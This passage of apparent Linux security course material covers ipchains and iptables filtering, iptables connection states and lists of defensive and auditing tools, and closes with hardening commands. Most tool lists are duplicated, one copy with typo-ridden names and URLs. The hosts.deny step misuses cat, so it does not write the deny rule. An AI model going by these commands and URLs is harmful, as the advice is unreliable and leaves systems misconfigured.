This rule prevents packets that have addresses beginning with 127. from entering the machine. The reason for this is that any IP address starting with 127. is a loopback address, and only used internally. That means that any packet coming into the ppp or ethernet device matching this rule is spoofed.

In the above example, input refers to the chain. There are three built-in chains: input, output and forward. The input chain refers to packets that are coming into the machine. These packets can be coming from a variety of sources. The output chain refers to packets that are leaving the machine. Again, these packets can be leaving through any interface which connects the computer to any network. The forward chain refers to packets that are received that are not destined for the machine. These packets are being routed through the machine. Note that each packet that passes through the forward chain also passes through both the input and output chains.

IPTables

• IPTables is the replacement of userspace tool ipchains in the Linux 2.4 kernel and beyond. IPTables has many more features than IPChains.

• Connection tracking capability, i.e. the ability to do stateful packet inspection.

• Simplified behavior of packets negotiating the built-in chains (INPUT, OUTPUT and FORWARD)

• A clean separation of packet filtering and network address translation (NAT).

• Rate-limited connection and logging capability

• The ability to filter on tcp flag and tcp options, and also MAC addresses.

To simplify aspects of datagram processing in the kernel firewalling code and produce a filtering framework that was both much cleaner and much more flexible, Paul Russell made a new framework called netfilter.

The iptables utility is used to configure netfilter filtering rules. Its syntax borrows heavily from the ipchains command, but differs in one very significant respect: it is extensible. What this means is that its functionality can be extended without recompiling it. It manages this trick by using shared libraries.

The iptables command is used to configure both IP filtering and Network Address Translation. To facilitate this, there are two tables of rules called filter and nat. The filter table is assumed if you do not specify the -t option to override it. Five built-in chains are also provided. The INPUT and FORWARD chains are available for the filter table, the PREROUTING and POSTROUTING chains are available for the nat table, and the OUTPUT chain is available for both tables.

All connection tracking is handled in the PREROUTING chain, except locally generated packets which are handled in the OUTPUT chain. This implies that iptables does all recalculation of states within the PREROUTING chain. If an initial packet is sent in a stream, the state gets set to NEW within the OUTPUT chain, and when the system receives a return packet, the state gets changed in the PREROUTING chain to ESTABLISHED. If the first packet is not originated by the local machine, the NEW state is set within the PREROUTING chain. So, all state changes and calculations are done within the PREROUTING and OUTPUT chains of the nat table.

Syntax: iptables [-t table ] command [match] [target/jump]

In IPTables, there are four types of ICMP that can be categorized as NEW or ESTABLISHED:

• Echo request (ping, 8) and echo reply (pong, 0)

• Timestamp request (13) and reply (14)

• Information request (15) and reply (16)

• Address mask request (17) and reply (18)

The requests in each case are classified as NEW and reply as ESTABLISHED.

Other types of ICMP are not request-reply based and can only be related to other connections.

Linux Tools: Application Security

• Whisker (http://www.wiretrip.net)

  Rain.Forest.Puppy's excellent CGIvulnerability scanner.

• Flawfinder (http://www.dwheeler.ccm/fawfinder/)

  Flawfinder is a Python program which searches through souircve code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first, this risk level depends not only on the function, but on the values of the parameters of the function.

• StackGuard (hhtp://www.immunix.org)

  StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attack Protection requires no source code changes at all.

• Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

  It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs

• Whisker (http://www.wiretrip.net)

  Rain.Forest.Puppy's excellent CGI vulnerability scanner.

• Flawfinder (http://www.dwheeler.com/flawfinder/)

  Flawfinder is a Python program which searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but also on the values of the parameters of the function.

• StackGuard (hhtp://www.immunix.org)

  StackGuard is a compiler that emits programs hardened against "stack smashing" attacks. Stack smashing attacks are a common form of penetration attack. Programs that have been compiled with StackGuard are largely immune to stack smashing attack. Protection requires no source code changes at all.

• Libsafe (http://www.avayalabs.com/project/libsafe/index.html)

  It is generally accepted that the best solution to buffer overflow and format string attacks is to fix the defective programs.

  Linux Tools: Intrusion Detection Systems

  • Tripwire (http://www.tripwire.com)

    A file and directory integrity checker.

  • LIDS (http://www.turbolinux.com.cn/lids/)

    The LIDS (Linux Intrusion Detection System) is an intrusion detection /defense system in the Linux kernel. The goal is to protect Linux systems disabling some system calls in the kernel itself.

  • AIDE (http://www.cs.tut.fi/^rammer/aide.html)

    AIDE (Advanced Intrusion detection Environment) is an Open Source IDS package.

  • Snort (http://www.snort.org)

    Flexible packet sniffer/logger that detects attacks, snort is a libpcap-based packet sniffer/logger which can be used as a lightweight Network Intrusion Detection System.

  • Samhain (http://samhain. sourceforge .net)

    Samhain is designed for intuitive configuration and tamper-resistance, and can be configured as a client/server application to monitor many hosts on a network from a single central location.

   

• Tripwire ( http://www.tripwire.com ) - A file and directory integrity checker.

• LIDS (http://www.turbolinux.com.cn/lids/)

  The LIDS (Linux Intrusion Detection System) is an intrusion detection /defense system in the Linux kernel. The goal is to protect Linux systems disabling some system calls in the kernel itself.

• AIDE (http://www.cs.tut.fi/^rammer/aide.html)

  AIDE (Advanced Intrusion detection Environment) is an Open Source IDS package.

• Snort (http://www.snort.org)

  Flexible packet sniffer/logger that detects attacks. Snort is a libpcap-based packet sniffer/logger, which can be used as a lightweight Network Intrusion Detection System.

• Samhain (http://samhain.sourceforge.net)

  Samhain is designed for intuitive configuration and tamper-resistance, and can be configured as a client/server application to monitor many hosts on a network from a single central location.

  Linux Tools: Security Testing Tools

  • NMap (http://www.insecure.org/nmap)

    Premier network auditing and testing tool.

  • LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof)

    LSOF lists open files for running Unix/Linux processes.

  • Netcat (http://www.atstake.com/research/tools/index.html)

    Netcat is a simple Unix utility which reads and writes data across network connections, using TCP or UDP protocol.

  • Hping2 (http://www.kyuzz.org/antirez/hping/)

    hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies like ping does with ICMP replies.

  • Nemesis (http://www.packetninja.net/nemesis/)

    The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux

   

• NMap (http://www.insecure.org/nmap)

  Premier network auditing and testing tool.

• LSOF (ftp://vic.cc.pudue.edu/pub/tools/unix/lsof)

  LSOF lists open files for running Unix/Linux processes.

• Netcat (http://www.atstake.com/research/tools/index.html)

  Netcat is a simple UNIX utility, which reads and writes data across network connections, using TCP or UDP protocol.

• Hping2 (http://www.kyuzz.org/antirez/hping/)

  hping2 is a network tool able to send custom ICMP/UDP/TCP packets and to display target replies as ping does with ICMP replies.

• Nemesis (http://www.packetninja.net/nemesis/)

  The Nemesis Project is designed to be a command-line based, portable human IP stack for Unix/Linux

  Linux Tools: Encryption

  • Stunnel (http://www. stunnel .org)

    Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both Unix and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to daemon's code.

  • OpenSSH /SSH (http://www.openssh.com/)

    SSH (Secure Shell is a program for logging into a remote machine and for executinmg commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network.

  • GnuPG (http://www.gnupg.org)

    GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.

   

• Stunnel (http://www.stunnel.org)

  Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL (Secure Sockets Layer) available on both UNIX and Windows. Stunnel can allow you to secure non-SSL aware daemons and protocols (like POP, IMAP, NNTP, LDAP, etc) by having Stunnel provide the encryption, requiring no changes to daemon's code.

• OpenSSH /SSH (http://www.openssh.com/)

  SSH (Secure Shell is a program for logging into a remote machine and for executing commands on a remote machine. It provides secure encrypted communications between two untrusted hosts over an insecure network.

• GnuPG (http://www.gnupg.org)

  GnuPG is a complete and free replacement for PGP. Since it does not use the patented IDEA algorithm, it can be used without any restrictions.

  Linux Tools: Log and Traffic Monitors

  • MRTG (http://www.mrtg.org)

    The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links.

  • Swatch (http://www. stanford .edu/^atkins/swatch/)

    Swatch, the simple watch daemon is a program for Unix system logging.

  • Timbersee http://www.fastcoder.net/^thumper/software/sysadmin/timbersee/)

    Timbersee is a program very similar to the Swatch program.

  • Logsurf(http://www.cert.dfn.de/eng/logsurf/)

    The program log surfer was designed to monitor any text-based logfiles on the system in realtime.

  • TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html)

    Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger etc. requests.

   

• MRTG (http://www.mrtg.org)

  The Multi-Router Traffic Grapher (MRTG) is a tool to monitor the traffic load on network-links.

• Swatch (http://www.stanford.edu/^atkins/swatch/)

  Swatch, the simple watch daemon is a program for UNIX system logging.

• Timbersee http://www.fastcoder.net/^thumper/software/sysadmin/timbersee/)

  Timbersee is a program very similar to the Swatch program.

• Logsurf (http://www.cert.dfn.de/eng/logsurf/)

  The program log surfer was designed to monitor any text-based log files on the system in real-time.

• TCP Wrappers (ftp://ftp.prcupine.org/pub/security/index.html)

  Wietse Venema's network logger, also known as TCPD or LOG_TCP. These programs log the client hostname of incoming telnet, ftp, rsh, rlogin, finger etc. requests.

  Linux Tools: Log and Traffic Monitors

  • IPLog (http://ojnk.sourceforge.net/)

    iplog is a TCP?IP traffic logger. Currently, it is capable of logging TCP, UDP and ICMP traffic.

  • IPTraf(http://cebu.mozcom.com/riker/iptraf/)

    IPTraf is an ncurses based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info , node stats, IP checksum errors and others.

  • Ntop (http://www.ntop.org)

    ntop is a Unix/Linux tool that shows the network usage, similar to what the popular "top" Unix/Linux command does.

   

• IPLog (http://ojnk.sourceforge.net/)

  iplog is a TCP. IP traffic logger. Currently, it is capable of logging TCP, UDP and ICMP traffic.

• IPTraf (http://cebu.mozcom.com/riker/iptraf/)

  IPTraf is an ncurses based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors and others.

• Ntop (http://www.ntop.org)

  ntop is a Unix/Linux tool that shows the network usage, similar to what the popular "top" Unix/Linux command does.

Linux Security Countermeasures

Physical Security:

lock your computer physical in a secure place.

Password Security:

Do not assign easy-to-guess password.

Do not share your account with other person.

Check user account with null passwd (without passwd) in /etc/shadow.

Network Security:

Close the door first by denying access from network by default.

$ cat "ALL:ALL" >> /etc/hosts.deny

Stop all unused services such as sendmail, NFS.

$ chkconfig --list

$ chkconfig --del sendmail

$ chkconfig --del nfslock

$ chkconfig --del rpc

Check system logs in /var/log regularly especially /var/log/secure.

Update your Linus system regularly.

Checking the errata (bug fixes) in

http://www.redhat.com/support/errata

The update packages can be found in ftp://updates.redhat.com

Summary

• Linux is gaining popularity and is fast becoming a stable industry strength OS.

• Once the IP address of a target system is known, an attacker can begin port scanning, looking for holes in the system for gaining access. Nmap being a popular tool.

• Password cracking tools are available for Linux as well.

• Sniffers as well as Packet assembly/analyzing tools for Linux provide attackers with the edge that they have dealing with other OSs.

• Attackers with root privileges can engage in session hijacking as well.

• Trojans, backdoors, worms are also prevalent in the Linux environment.

• As with any other system, a well developed integrated procedure is to be put in place to counter the threats that exist.